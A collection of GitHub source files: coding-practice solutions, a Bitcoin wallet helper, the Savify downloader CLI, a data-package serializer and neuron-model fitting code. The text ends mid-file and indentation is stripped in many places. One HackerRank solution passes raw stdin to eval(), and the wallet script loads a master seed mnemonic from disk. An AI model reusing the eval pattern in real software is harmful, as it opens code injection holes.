return len(string) == len(str(stringAsInt)) # check for leading 0 # 00 converted to 0, 01 converted to 1
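# Illustrative usage sketch; the input string is assumed from the common sample for this problem.
if __name__ == '__main__':
    print(validIPAddresses("1921680"))
    # e.g. ['1.9.216.80', '1.92.16.80', '1.92.168.0', '19.2.16.80', ...]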
```
#### File: 3.algorithmic_expert/Tries/1.Suffix Trie Construction.py
```python
"""
Explain the solution:
- Building a suffix-trie-like data structure consists of essentially storing every suffix of a given string in a trie. To do so, iterate through the input string one character at a time, and insert every substring starting at each character and ending at the end of string into the trie.
- To insert a string into the trie, start by adding the first character of the string into the root node of the trie and map it to an empty hash table if it isn't already there. Then, iterate through the rest of the string, inserting each of the remaining characters into the previous character's corresponding node (or hash table) in the trie, making sure to add an endSymbol "*" at the end.
- Searching the trie for a specific string should follow a nearly identical logic to the one used to add a string in the trie.
# Creation: O(n^2) time | O(n^2) space - where n is the length of the input string
# Searching: O(m) time | O(1) space - where m is the length of the input string
##################
Detailed explanation of the Solution:
create a class called SuffixTrie:
initialize function takes in a string:
initialize the class with root as an empty hash table
initialize the class with a endSymbol variable that is set to "*"
create a method called populateSuffixTrieFrom with a parameter of string
# Creation:
initialize function populateSuffixTrieFrom takes in a string:
iterate as i through the string one character at a time:
use Helper function insertSubsStringStartingAt with the parameter of the string and the current character(i)
initialize function insertSubsStringStartingAt takes in a string and a character(i):
create a variable called node that is set to the root of the trie
iterate as j through the string starting at the character(i) and ending at the end of the string:
create a variable called letter that is set to the current string[j]
if the letter is not in the node:
create a new hash table and set it to the node[letter] # this is the first time we've seen this letter
create a variable called node that is set to the node[letter] # this is the node we're currently at
node[self.endSymbol] = True # insert the endSymbol "*" at the end of the string
# Searching:
initialize function contains takes in a string:
create a variable called node that is set to the root of the trie
iterate as letter through the string:
if the letter is not in the node:
return False
create a variable called node that is set to the node[letter]
return self.endSymbol in node # return True if the endSymbol "*" is in the node
"""
####################################
class SuffixTrie:
def __init__(self, string):
self.root = {}
self.endSymbol = "*"
self.populateSuffixTrieFrom(string) #call the populateSuffixTrieFrom function with the string as a parameter
# Creation
def populateSuffixTrieFrom(self, string):
for i in range(len(string)):
self.insertSubstringStartingAt(string, i) #insert the substring starting at each character and ending at the end of string into the trie
def insertSubstringStartingAt(self, string, i):
node = self.root
for j in range(i, len(string)):#iterate through the string starting at the index i
letter = string[j] #get the letter at the index j
if letter not in node:
node[letter] = {} #if the letter is not in the node, add it to the node and map it to an empty hash table
node = node[letter] # this is the node that we are currently at
node[self.endSymbol] = True
# Searching
def contains(self, string):
node = self.root #start at the root node
for letter in string:
if letter not in node: #if the current letter is not in the node, return false
return False
node = node[letter] #move to the next node
return self.endSymbol in node #return True if the endSymbol "*" is in the node
def main():
string = "babc"
trie = SuffixTrie(string)
print(trie.root)
if __name__ == '__main__':
main()
```
#### File: 4.hacker_rank/A.30 Days of Code/002_operators.py
```python
def solve(meal_cost, tip_percent, tax_percent):
tip = (meal_cost * tip_percent) / 100
tax = (meal_cost * tax_percent) / 100
totalCost = int(round(meal_cost + tip + tax))
print(totalCost)
if __name__ == '__main__':
meal_cost = 12.0
tip_percent = 20
tax_percent = 8
    solve(meal_cost, tip_percent, tax_percent)
```
#### File: 4.hacker_rank/A.30 Days of Code/011_2D_array.py
```python
import os
# hourglass
# a b c
# d
# e f g
# Complete the hourglassSum function below.
def hourglassSum(arr):
sum = []
for i in range(len(arr)-2): #-2 because (from hour glass), if the pointer is at 'a' it can go to 'b' and then 'c' by adding 1 and then 1 again
# - 2 is basically done for indexing coz defined by hourglass
for j in range(len(arr)-2): # -2 because if the pointer is at 'a' it can go go 'e' 'f' 'g' by adding 1 and then 1 again
sum.append(
arr[i][j]
+arr[i][j+1]
+arr[i][j+2]
+arr[i+1][j+1]
+arr[i+2][j]
+arr[i+2][j+1]
+arr[i+2][j+2])
# print(max(sum)) # debug output
return(max(sum))
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
arr = []
for _ in range(6):
arr.append(list(map(int, input().rstrip().split())))
result = hourglassSum(arr)
fptr.write(str(result) + '\n')
fptr.close()
```
#### File: 4.hacker_rank/A.30 Days of Code/012_inheritance.py
```python
# Grading Scale
# O | 90 <= a <= 100
# E | 80 <= a < 90
# A | 70 <= a < 80
# P | 55 <= a < 70
# D | 40 <= a < 55
# T | a < 40
class Person:
def __init__(self, firstName, lastName, idNumber):
self.firstName = firstName
self.lastName = lastName
self.idNumber = idNumber
def printPerson(self):
print("Name:", self.lastName + ",", self.firstName)
print("ID:", self.idNumber)
class Student(Person):
# Class Constructor
def __init__(self, firstName, lastName, idNumber, scores):
Person.__init__(self, firstName, lastName, idNumber)
self.scores = scores
# Write your function here
def calculate(self):
sum = 0
        for score in self.scores:
            sum += score
        average = sum / len(self.scores)
if average < 40:
return 'T'
elif average < 55:
return 'D'
elif average < 70:
return 'P'
elif average < 80:
return 'A'
elif average < 90:
return 'E'
else:
return 'O'
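# Illustrative usage sketch (sample values assumed); the original HackerRank driver
# reads these values from stdin instead.
if __name__ == '__main__':
    s = Student("Heraldo", "Memelli", 8135627, [100, 80])
    s.printPerson()
    print("Grade:", s.calculate())  # average 90 -> 'O'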
```
#### File: C.Algorithms/001_Warm_up/005_diagonal_difference.py
```python
import math
import os
import random
import re
import sys
def diagonalDifference(arr):
l, r = 0, 0
for i in (range(len(arr))):
l += arr[i][i]
r += arr[i][-i-1]
return abs(l-r)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input().strip())
arr = []
for _ in range(n):
arr.append(list(map(int, input().rstrip().split())))
result = diagonalDifference(arr)
fptr.write(str(result) + '\n')
fptr.close()
```
#### File: D.Practice/002_Basic Data Types/005_lists.py
```python
#Sample Output 0
#[6, 5, 10]
#[1, 5, 9 , 10]
#[9, 5, 1]
def handler(result):
inp = input().split()
command = inp[0]
values = inp[1:]
if command == 'print':
print(result)
else:
execute = 'result.' + command + "(" + ",".join(values) + ")"
eval(execute)
result = []
for i in range(int(input())):
handler(result)
```
#### File: 7.LC_Pattern/Array/maximum_subarray.py
```python
import unittest
from typing import List
class Solution:
# O(n) time, O(1) space
def maxSubArray(self, nums) -> int:
max_sum, current_sum = -float('inf'), 0
for num in nums:
current_sum = max(num, current_sum + num) # if current_sum + num < 0, then current_sum = 0
max_sum = max(current_sum, max_sum) # if current_sum > max_sum, then current_sum is the new max_sum
return max_sum
# divide and conquer
# O(nlogn) time, O(1) space
def maxSubArray_divide_conquer(self, nums) -> int:
if len(nums) == 1:
return nums[0]
# if len(nums) == 0, return 0
if len(nums) == 0:
return 0
# divide
mid = len(nums) // 2
left_sum = self.maxSubArray_divide_conquer(nums[:mid])
right_sum = self.maxSubArray_divide_conquer(nums[mid:])
# conquer
left_sum_max = nums[mid - 1] # nums[mid - 1] is the last element of left subarray
left_sum_current = 0
for i in range(mid - 1, -1, -1): # from mid - 1 to 0
left_sum_current += nums[i] # sum up all the elements in left subarray
left_sum_max = max(left_sum_max, left_sum_current) # if left_sum_current > left_sum_max, then left_sum_current is the new left_sum_max
right_sum_max = nums[mid] # nums[mid] is the first element of right subarray
right_sum_current = 0
for i in range(mid, len(nums)): # from mid to len(nums) - 1
right_sum_current += nums[i] # sum up all the elements in right subarray
right_sum_max = max(right_sum_max, right_sum_current) # if right_sum_current > right_sum_max, then right_sum_current is the new right_sum_max
return max(left_sum, right_sum, left_sum_max + right_sum_max)
# dynamic programming
# O(n) time, O(1) space
def maxSubArray_dynamic_programming(self, nums: List[int]) -> int:
best = nums[0]
current = nums[0]
for i in nums[1:]:
current = max(i, current + i)
if current > best:
best = current
return best
class Test(unittest.TestCase):
def test(self):
test = Solution()
nums = [-2,1,-3,4,-1,2,1,-5,4]
self.assertEqual(test.maxSubArray(nums), 6)
def test_divide_conquer(self):
test = Solution()
nums = [-2,1,-3,4,-1,2,1,-5,4]
self.assertEqual(test.maxSubArray_divide_conquer(nums), 6)
def test_dynamic_programming(self):
test = Solution()
nums = [-2,1,-3,4,-1,2,1,-5,4]
self.assertEqual(test.maxSubArray_dynamic_programming(nums), 6)
def main():
unittest.main()
if __name__ == "__main__":
main()
``` |
{
"source": "jimmymasaru/savify",
"score": 2
} |
#### File: savify/savify/cli.py
```python
import sys
import re
import click
import logging
from os import system
from pathlib import Path
from . import __version__, __author__
from .types import *
from .utils import PathHolder, create_dir
from .savify import Savify
from .logger import Logger
from .exceptions import FFmpegNotInstalledError, SpotifyApiCredentialsNotSetError, UrlNotSupportedError, \
InternetConnectionError
BANNER = rf"""
/$$$$$$$$$$$$$ /$$$$$$ /$$ /$$$$$$
| $$$$$$$$$$$$$ /$$__ $$ |__/ /$$__ $$
| $$$$$$$$$$$$$ | $$ \__/ /$$$$$$ /$$ /$$ /$$| $$ \__//$$ /$$
| $$$$$$$$$$$$$ | $$$$$$ |____ $$| $$ /$$/| $$| $$$$ | $$ | $$
| $$$$$$$$$$$$$ \____ $$ /$$$$$$$ \ $$/$$/ | $$| $$_/ | $$ | $$
/$$$$$$$$$$$$$$$$$$ /$$ \ $$ /$$__ $$ \ $$$/ | $$| $$ | $$ | $$
\ $$$$$$$$$$$$$$$$/ | $$$$$$/| $$$$$$$ \ $/ | $$| $$ | $$$$$$$
\ $$$$$$$$$$$$/ \______/ \_______/ \_/ |__/|__/ \____ $$
\ $$$$$$$$/ /$$ | $$
\ $$$$/ https://github.com/LaurenceRawlings/savify | $$$$$$/
\_/ \______/ v{__version__}
"""
system('title Savify')
class Choices:
BOOL = ['true', 'false']
PATH = '<SYSTEM PATH>'
TYPE = ['track', 'album', 'playlist', 'artist']
QUALITY = ['best', '320k', '256k', '192k', '128k', '96k', '32k', 'worst']
FORMAT = ['mp3', 'aac', 'flac', 'm4a', 'opus', 'vorbis', 'wav']
GROUPING = "%artist%, %album%, %playlist% separated by /"
def choices(choice) -> str:
return ', '.join(choice)
def get_choice() -> str:
return input('[INPUT]\tEnter choice: ').lower()
def show_banner() -> None:
click.clear()
click.echo(BANNER)
def validate_group(_ctx, _param, value):
regex = r"^((%artist%|%album%|%playlist%)(\/(%artist%|%album%|%playlist%))*)+$"
if re.search(regex, str(value)) or value is None:
return value
else:
raise click.BadParameter('Group must be in the form x or x/x/x... where x in [%artist%, %album%, %playlist%]')
def guided_cli(type, quality, format, output, group, path, m3u, artist_albums, skip_cover_art):
choice = ''
options = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
errors = []
while not choice or choice.lower() in options:
show_banner()
print(' Options\tChoices\t\t\t\t\t\tSelected\n--------------------------------------------------------'
'----------------')
print(f'[1] Type\t{choices(Choices.TYPE)}\t\t\t{type}\n'
f'[2] Quality\t{choices(Choices.QUALITY)}\t{quality}\n'
f'[3] Format\t{choices(Choices.FORMAT)}\t\t{format}\n'
f'[4] Output\t{Choices.PATH}\t\t\t\t\t{output}\n'
f'[5] Grouping\t{Choices.GROUPING}\t{group}\n'
f'[6] Temp\t{Choices.PATH}\t\t\t\t\t{path}\n'
f'[7] Create M3U\t{choices(Choices.BOOL)}\t\t\t\t\t{m3u}\n'
f'[8] Cover-art\t{choices(Choices.BOOL)}\t\t\t\t\t{not skip_cover_art}\n'
f'[9] All Albums\t{choices(Choices.BOOL)}\t\t\t\t\t{artist_albums}\n'
f'\n[0] Exit\n')
for error in errors:
print(f'[ERROR]\t{error}')
errors = []
choice = input('[INPUT]\tEnter an option or a search query: ')
# TODO: This is horrendous
if choice == '0':
sys.exit(0)
elif choice == '1':
type_input = get_choice()
if type_input in Choices.TYPE:
type = convert_type(type_input)
else:
errors.append('Invalid choice')
elif choice == '2':
quality_input = get_choice()
if quality_input in Choices.QUALITY:
quality = convert_quality(quality_input)
else:
errors.append('Invalid choice')
elif choice == '3':
format_input = get_choice()
if format_input in Choices.FORMAT:
format = convert_format(format_input)
else:
errors.append('Invalid choice')
elif choice == '4':
output_input = get_choice()
try:
create_dir(Path(output_input))
output = output_input
except:
errors.append('Invalid path')
elif choice == '5':
group_input = get_choice()
if validate_group(None, None, group_input):
group = group_input
else:
errors.append('Invalid group syntax')
elif choice == '6':
path_input = get_choice()
try:
create_dir(Path(path_input))
path = path_input
except:
errors.append('Invalid path')
elif choice == '7':
m3u_input = get_choice()
if m3u_input in Choices.BOOL:
m3u = convert_bool(m3u_input)
else:
errors.append('Invalid choice')
elif choice == '8':
skip_cover_art_input = get_choice()
if skip_cover_art_input in Choices.BOOL:
skip_cover_art = not convert_bool(skip_cover_art_input)
else:
errors.append('Invalid choice')
elif choice == '9':
artist_albums_input = get_choice()
if artist_albums_input in Choices.BOOL:
artist_albums = convert_bool(artist_albums_input)
else:
errors.append('Invalid choice')
query = choice
show_banner()
return type, quality, format, output, group, path, m3u, query, artist_albums, skip_cover_art
@click.command(name='Savify', context_settings=dict(allow_extra_args=True, ignore_unknown_options=True))
@click.help_option()
@click.version_option(version=__version__)
@click.option('-t', '--type', default=Choices.TYPE[0], help='Query type for text search.',
type=click.Choice(Choices.TYPE))
@click.option('-q', '--quality', default=Choices.QUALITY[0], help='Bitrate for downloaded song(s).',
type=click.Choice(Choices.QUALITY))
@click.option('-f', '--format', default=Choices.FORMAT[0], help='Format for downloaded song(s).',
type=click.Choice(Choices.FORMAT))
@click.option('-g', '--group', default=None, callback=validate_group, help=Choices.GROUPING, type=click.STRING)
@click.option('-o', '--output', default=None, help='Output directory for downloaded song(s).',
type=click.Path(exists=True, file_okay=False, dir_okay=True, writable=True, readable=True))
@click.option('-p', '--path', default=None, help='Path to directory to be used for data and temporary files.',
type=click.Path(exists=True, file_okay=False, dir_okay=True, writable=True, readable=True))
@click.option('-m', '--m3u', is_flag=True, help='Create an M3U playlist file for your download.')
@click.option('-a', '--artist-albums', is_flag=True, help='Download all artist songs and albums'
', not just top 10 songs.')
@click.option('-l', '--language', default=None, help='ISO-639 language code to be used for searching and tags applying.',
type=click.STRING)
@click.option('--skip-cover-art', is_flag=True, help='Don\'t add cover art to downloaded song(s).')
@click.option('--silent', is_flag=True, help='Hide all output to stdout, overrides verbosity level.')
@click.option('-v', '--verbose', count=True, help='Change the log verbosity level. [-v, -vv]')
@click.argument('query', required=False)
@click.pass_context
def main(ctx, type, quality, format, output, group, path, m3u, artist_albums, verbose, silent, query, skip_cover_art, language):
if not silent:
show_banner()
log_level = convert_log_level(verbose)
else:
log_level = None
guided = False
if not query:
guided = True
type, quality, format, output, group, path, m3u, query, artist_albums, skip_cover_art = \
guided_cli(type, quality, format, output, group, path, m3u, artist_albums, skip_cover_art)
path_holder = PathHolder(path, output)
output_format = convert_format(format)
query_type = convert_type(type)
quality = convert_quality(quality)
logger = Logger(path_holder.data_path, log_level)
ydl_options = {ctx.args[i][2:]: ctx.args[i+1] for i in range(0, len(ctx.args), 2)}
def setup(ffmpeg='ffmpeg'):
return Savify(quality=quality, download_format=output_format, path_holder=path_holder, group=group,
skip_cover_art=skip_cover_art, language=language, logger=logger, ffmpeg_location=ffmpeg,
ydl_options=ydl_options)
def check_guided():
if guided:
input('\n[INFO]\tPress enter to exit...')
try:
s = setup()
except FFmpegNotInstalledError as ex:
from .ffmpegdl import FFmpegDL
ffmpeg_dl = FFmpegDL(str(path_holder.data_path))
if not ffmpeg_dl.check_if_file():
logger.error(ex.message)
if silent:
check_guided()
return 1
choice = input('[INPUT]\tWould you like Savify to download FFmpeg for you? (Y/n) ')
if choice.lower() == 'y' or not choice:
logger.info('Downloading FFmpeg...')
try:
ffmpeg_location = ffmpeg_dl.download()
except:
logger.error('Failed to download FFmpeg!')
check_guided()
return 1
logger.info(f'FFmpeg downloaded! [{ffmpeg_location}]')
else:
check_guided()
return 1
else:
ffmpeg_location = ffmpeg_dl.final_location
s = setup(ffmpeg=str(ffmpeg_location))
except SpotifyApiCredentialsNotSetError as ex:
logger.error(ex.message)
check_guided()
return 1
try:
s.download(query, query_type=query_type, create_m3u=m3u, artist_albums=artist_albums)
except UrlNotSupportedError as ex:
logger.error(ex.message)
check_guided()
return 1
except InternetConnectionError as ex:
logger.error(ex.message)
check_guided()
return 1
check_guided()
return 0
def convert_type(query_type: str) -> Type:
mapping = {
'track': Type.TRACK,
'album': Type.ALBUM,
'playlist': Type.PLAYLIST,
"artist": Type.ARTIST,
}
return mapping[query_type.lower()]
def convert_quality(quality: str) -> Quality:
mapping = {
'best': Quality.BEST,
'320k': Quality.Q320K,
'256k': Quality.Q256K,
'192k': Quality.Q192K,
'128k': Quality.Q128K,
        '96k': Quality.Q96K,
'32k': Quality.Q32K,
'worst': Quality.WORST,
}
return mapping[quality.lower()]
def convert_format(output_format: str) -> Format:
mapping = {
'mp3': Format.MP3,
'aac': Format.AAC,
'flac': Format.FLAC,
'm4a': Format.M4A,
'opus': Format.OPUS,
'vorbis': Format.VORBIS,
'wav': Format.WAV,
}
return mapping[output_format.lower()]
def convert_bool(boolean) -> bool:
return boolean.lower() == 'true'
def convert_log_level(verbosity: int) -> int:
if verbosity == 1:
return logging.WARNING
elif verbosity == 2:
return logging.DEBUG
else:
return logging.INFO
if __name__ == "__main__":
sys.exit(main()) # pragma: no cover
``` |
{
"source": "jimmymathews/MITI",
"score": 2
} |
#### File: mititools/serializers/frictionless.py
```python
import os
from os import mkdir
from os.path import join
from os.path import exists
import json
import importlib.resources
import jinja2
from jinja2 import Environment
from jinja2 import BaseLoader
with importlib.resources.path('mititools', 'fd_schema.json.jinja') as file:
jinja_environment = Environment(loader=BaseLoader)
fd_schema_file_contents = open(file, 'rt').read()
from ..default_values import fd_package_path
from ..name_manipulation import create_table_filename
from ..name_manipulation import create_auxiliary_table_filename
def write_frictionless(top_variables, data_tables):
json_str = render_json_data_package(top_variables)
json_object = json.loads(json_str)
payload = json.dumps(json_object, indent=2)
json_filename = 'datapackage.json'
if not exists(fd_package_path):
mkdir(fd_package_path)
with open(join(fd_package_path, json_filename), 'wt') as f:
f.write(payload)
for tablename, df in data_tables.items():
if list(df.columns) != ['value']:
filename = create_table_filename(tablename)
else:
filename = create_auxiliary_table_filename(tablename)
df.to_csv(join(fd_package_path, filename), sep='\t', index=False)
def render_json_data_package(variables):
template = jinja_environment.from_string(fd_schema_file_contents)
return template.render(**variables)
``` |
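A minimal sketch of the string-template rendering pattern `render_json_data_package` relies on. The template text and variable names below are illustrative stand-ins, not the real `fd_schema.json.jinja`.
```python
from jinja2 import Environment, BaseLoader

# Render a template held in a plain string, mirroring how
# fd_schema_file_contents is rendered above.
env = Environment(loader=BaseLoader())
template = env.from_string('{"name": "{{ package_name }}", "resource_count": {{ resource_count }}}')
print(template.render(package_name="demo-package", resource_count=3))
# -> {"name": "demo-package", "resource_count": 3}
```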
{
"source": "JimmyMow/21-wallet",
"score": 3
} |
#### File: api/wallet/main.py
```python
import sys
import json
from os.path import expanduser
from two1.wallet import Two1Wallet
class Wallet():
def __init__(self):
with open('{}/.two1/wallet/default_wallet.json'.format(expanduser('~'))) as data_file:
wallet_data = json.load(data_file)
self.two1Wallet = Two1Wallet.import_from_mnemonic(mnemonic=wallet_data['master_seed'])
def address(self):
return self.two1Wallet.get_payout_address()
def confirmed(self):
return self.two1Wallet.confirmed_balance()
def unconfirmed(self):
return self.two1Wallet.unconfirmed_balance()
def history(self):
return self.two1Wallet.transaction_history()
wallet = None
wallet = wallet or Wallet()
del sys.argv[0]
for arg in sys.argv:
method = getattr(wallet, arg)
print(json.dumps({ arg: method() }))
``` |
{
"source": "JimmyMVP/neuron_to_nest_simplification",
"score": 3
} |
#### File: JimmyMVP/neuron_to_nest_simplification/current_generation.py
```python
import numpy as np
class CurrentGenerator:
def __init__(self, seed=777, time=5000, tau=3.0, i_e0=0.5, sigmaMax=0.325,
sigmaMin=0.215, frequency=0.2, dt=0.025, voltage=[],
threshold=0.0, sigmaOpt=0.51, optimize_flag=False, simulator=None):
self.simulator = simulator
self.seed = np.random.seed(seed)
self.time = time
self.tau = tau
self.i_e0 = i_e0
self.i_e = []
self.m_ie = []
self.sigmaMax = sigmaMax
self.sigmaMin = sigmaMin
self.sigma = (self.sigmaMax + self.sigmaMin) / 2
self.delta_sigma = (self.sigmaMax - self.sigmaMin) / (2 * self.sigma)
self.sin_variance = []
self.duration = 0.0
self.frequency = frequency
self.dt = dt
self.voltage = voltage
self.tolerance = 0.2
self.spks = []
self.spks_flag = False
self.threshold = threshold
self.optsigma = sigmaOpt
self.spks = []
self.optimize_flag = optimize_flag
def generate_current(self):
self.i_e = 0.0
if self.optimize_flag:
self.sin_variance = \
[variance for variance in self.current_variance_opt()]
else:
self.sin_variance = \
[variance for variance in self.current_variance()]
ou_process = [ou for ou in self.ou_process()]
moving_current = [mc for mc in self.moving_current_gen()]
for n, k in enumerate(np.arange(self.time / self.dt)):
"""
sin_sigma = sigma*(1+delta_sigma*np.sin(2*np.pi*f*t*10**-3))
I = OU_process*sin_sigma + mu
"""
yield self.i_e
self.i_e = ou_process[n] * self.sin_variance[n] + moving_current[n]
def moving_current_gen(self):
for _ in np.arange(self.time/self.dt):
yield self.i_e0*(1+np.sin(2 * np.pi * _
* self.frequency
* self.dt
* 10 ** -3
* 0.1
))
def ou_process(self):
for _ in np.arange(self.time/self.dt):
yield self.i_e
self.i_e = (self.i_e +
(self.i_e0 - self.i_e) * (self.dt / self.tau) +
0.5 * np.sqrt(2.0 * self.dt / self.tau) *
np.random.normal())
def sub_threshold_var(self):
selection = self.get_far_from_spikes()
sv = np.var(self.voltage[selection])
assert (np.max(self.voltage[selection]) < self.threshold)
return sv
def current_variance(self):
for time in np.arange(self.time / self.dt):
yield (self.sigma * (0.3 + self.delta_sigma * np.sin(2 * np.pi *
time
* self.frequency
* self.dt
* 10 ** -3)))
def current_variance_opt(self):
for time in np.arange(int(self.time / self.dt)):
yield (self.optsigma * (1.0 + 0.5 * np.sin(2 * np.pi * time
* self.frequency
* self.dt
* 10 ** -3)))
def detect_spikes(self, ref=7.0):
"""
Detect action potentials by threshold crossing (parameter threshold,
mV) from below (i.e. with dV/dt>0).
To avoid multiple detections of the same spike due to noise, use an
'absolute refractory period' ref, in ms.
"""
ref_ind = int(ref / self.dt)
t = 0
while t < len(self.voltage) - 1:
if (self.voltage[t] >= self.threshold >=
self.voltage[t - 1]):
self.spks.append(t)
t += ref_ind
t += 1
self.spks = np.array(self.spks)
self.spks_flag = True
return self.spks
def get_far_from_spikes(self, d_t_before=5.0, d_t_after=5.0):
"""
Return indices of the trace which are in ROI. Exclude all datapoints
which are close to a spike.
d_t_before: ms
d_t_after: ms
These two parameters define the region to cut around each spike.
"""
if not self.spks_flag:
self.detect_spikes()
L = len(self.voltage)
LR_flag = np.ones(L)
LR_flag[:] = 0.0
# Remove region around spikes
DT_before_i = int(d_t_before / self.dt)
DT_after_i = int(d_t_after / self.dt)
for s in self.spks:
lb = max(0, s - DT_before_i)
ub = min(L, s + DT_after_i)
LR_flag[lb: ub] = 1
indices = np.where(LR_flag == 0)[0]
return indices
```
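A short usage sketch of the spike-masking helpers in `CurrentGenerator`. The synthetic voltage trace, the import path and all numbers are illustrative assumptions, not part of the original module.
```python
import numpy as np
from current_generation import CurrentGenerator  # assumes the file above is importable

# Synthetic trace: sub-threshold noise around -65 mV with two brief suprathreshold events.
voltage = np.random.normal(-65.0, 1.0, size=4000)
voltage[1000:1004] = 20.0
voltage[3000:3004] = 20.0

gen = CurrentGenerator(voltage=voltage, threshold=0.0, dt=0.025)
spikes = gen.detect_spikes(ref=7.0)          # threshold crossings from below, with a refractory period
quiet = gen.get_far_from_spikes(5.0, 5.0)    # samples at least 5 ms away from any detected spike
print(len(spikes), gen.sub_threshold_var())  # 2 spikes; variance computed on the quiet samples only
```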
#### File: JimmyMVP/neuron_to_nest_simplification/modelfit.py
```python
import loading
import numpy as np
import cPickle as pickle
from Experiment import *
from GIF import *
from AEC_Badel import *
from AEC_Dummy import *
from Filter_Rect_LinSpaced import *
from Filter_Rect_LogSpaced import *
from Filter_Exps import *
import seaborn
import os
class GIFFit():
def __init__(self, simulator, plot=False):
self.simulator = simulator
self.V_units = 10 ** -3
self.I_units = 10 ** -9
self.trainData = []
self.testData = []
self.DT_beforespike = 5.0
self.T_ref = 4.0
self.tau_gamma = [10.0, 50.0, 250.0]
self.eta_tau_max = 1000.0
self.tau_opt = []
self.eta = []
self.gamma = []
self.plot = plot
@staticmethod
def chunks(l, n):
"""Yield successive n-sized chunks from l."""
for i in xrange(0, len(l), n):
yield l[i:i + n]
def run(self):
# Data[0] = Voltage, Data[1] = Current, Data[2] = Time
self.trainData, self.testData = loading.Loader(simulator=self.simulator).dataload()
self.myExp = Experiment('Experiment 1', .1)
for voltage, current, duration in zip(self.trainData[0],
self.trainData[1],
self.trainData[2]):
self.myExp.addTrainingSetTrace(voltage, self.V_units,
current, self.I_units,
np.size(duration) / 10,
FILETYPE='Array')
for voltage, current, duration in zip(self.testData[0],
self.testData[1],
self.testData[2]):
self.myExp.addTestSetTrace(voltage, self.V_units,
current, self.I_units,
np.size(duration) / 10,
FILETYPE='Array')
self.fitaec(self.myExp)
def paramDict(self, gif):
modelparam = {
'C_m': gif.C,
'g_L': gif.gl,
'E_L': gif.El,
'V_reset': gif.Vr,
't_ref': gif.Tref,
'V_T_star': gif.Vt_star,
'Delta_V': gif.DV,
'lambda_0': gif.lambda0,
'tau_stc': gif.eta.taus,
'q_stc': gif.eta.getCoefficients(),
'tau_sfa': gif.gamma.taus,
'q_sfa': gif.gamma.getCoefficients()
}
res = {
'model': modelparam
}
return res
def fitaec(self, myExp):
myAEC = AEC_Dummy()
myExp.setAEC(myAEC)
myExp.performAEC()
self.optimizetimescales(myExp)
def optimizetimescales(self, myExp):
if(self.plot):
myExp.plotTrainingSet()
myExp.plotTestSet()
myGIF_rect = GIF(0.1)
myGIF_rect.Tref = self.T_ref
myGIF_rect.eta = Filter_Rect_LogSpaced()
myGIF_rect.eta.setMetaParameters(length=500.0, binsize_lb=2.0,
binsize_ub=100.0, slope=4.5)
myGIF_rect.fitVoltageReset(myExp, myGIF_rect.Tref, do_plot=False)
myGIF_rect.fitSubthresholdDynamics(myExp,
DT_beforeSpike=self.DT_beforespike)
myGIF_rect.eta.fitSumOfExponentials(3, [1.0, 0.5, 0.1],
self.tau_gamma, ROI=None, dt=0.1)
print "Optimal timescales: ", myGIF_rect.eta.tau0
self.tau_opt = [t for t in myGIF_rect.eta.tau0 if t < self.eta_tau_max]
self.fitmodel(myExp)
def fitmodel(self, myExp):
myGIF = GIF(0.1)
myGIF.Tref = self.T_ref
myGIF.eta = Filter_Exps()
myGIF.eta.setFilter_Timescales(self.tau_opt)
myGIF.gamma = Filter_Exps()
myGIF.gamma.setFilter_Timescales(self.tau_gamma)
myGIF.fit(myExp, DT_beforeSpike=self.DT_beforespike)
myPrediction = myExp.predictSpikes(myGIF, nb_rep=500)
Md = myPrediction.computeMD_Kistler(4, 0.1)
if(self.plot):
myPrediction.plotRaster(delta=1000.0)
self.eta = myGIF.eta.getCoefficients()
self.gamma = myGIF.gamma.getCoefficients()
if(self.plot):
myGIF.plotParameters()
myGIF.save(os.path.join(self.simulator.PARAMETERS_PATH, 'myGIF.pck'))
self.model_params(myGIF)
def model_params(self, gif):
q_stc = []
q_sfa = []
res_dic = self.paramDict(gif)
# Fill in with your directory
pickle.dump(res_dic, open(os.path.join(self.simulator.PARAMETERS_PATH, 'GIFParams.pck'), "wb"))
for eta_index, eta in enumerate(res_dic['model']['q_stc']):
q_eta_temp = eta / (
1 - np.exp(-self.T_ref /
res_dic['model']['tau_stc'][eta_index]))
q_stc.append(q_eta_temp)
for gamma_index, gamma in enumerate(res_dic['model']['q_sfa']):
q_gamma_temp = gamma / (
1 - np.exp(-self.T_ref /
res_dic['model']['tau_sfa'][gamma_index]))
q_sfa.append(q_gamma_temp)
res_dic['model']['q_stc'] = q_stc
res_dic['model']['q_sfa'] = q_sfa
# Fill in with your directory MAKE SURE YOU USE THE SAME FOR NEST
pickle.dump(res_dic, open(os.path.join(self.simulator.PARAMETERS_PATH, "NESTParams.pck"), "wb"))
```
#### File: JimmyMVP/neuron_to_nest_simplification/NestGIFModel.py
```python
import nest
import nest.voltage_trace
import os
import numpy as np
import nest.raster_plot
import matplotlib.pyplot as plt
import cPickle as pickle
def dump_keys(d, lvl=0):
for k, v in d.iteritems():
print '%s%s' % (lvl * ' ', k)
if type(v) == dict:
dump_keys(v, lvl+1)
class NestModel:
def __init__(self, nest_params_path, threads=4):
self.name = self.__class__.__name__
self.built = False
self.connected = False
self.nest_params_path = nest_params_path
param_dict = pickle.load(open(nest_params_path))
param_dict['model']['C_m'] *= 10 ** 3
self.neuron_params = param_dict['model']
#Print parameters
dump_keys(self.neuron_params)
# NEST Model Parameters
self.neurons = 50
self.p_ex = 0.03
self.w_ex = 60.0
self.threads = threads
self.poisson_neurons = 5 # size of Poisson group
self.rate_noise = 5.0 # firing rate of Poisson neurons (Hz)
self.w_noise = 10.0 # synaptic weights from Poisson to population
self.dt = 0.1
self.simtime = 10000
# Misc
self.name = self.__class__.__name__
self.data_path = self.name + "/"
if not os.path.exists(self.data_path):
os.makedirs(self.data_path)
print("Writing data to: {0}".format(self.data_path))
nest.ResetKernel()
nest.SetKernelStatus({"data_path": self.data_path})
nest.SetKernelStatus({"resolution": self.dt})
def calibrate(self):
nest.SetKernelStatus({"print_time": True,
"local_num_threads": self.threads,
"resolution": self.dt})
def build(self):
"""
Create all nodes, used in the model.
"""
if self.built:
return
self.calibrate()
self.population = nest.Create("gif_psc_exp", self.neurons,
params=self.neuron_params)
self.noise = nest.Create("poisson_generator", self.poisson_neurons,
params={'rate': self.rate_noise})
self.spike_det = nest.Create("spike_detector")
self.voltmeter = nest.Create("voltmeter")
self.built = True
def connect(self):
"""
Connect all nodes in the model.
"""
if self.connected:
return
if not self.built:
self.build()
nest.Connect(self.population, self.population,
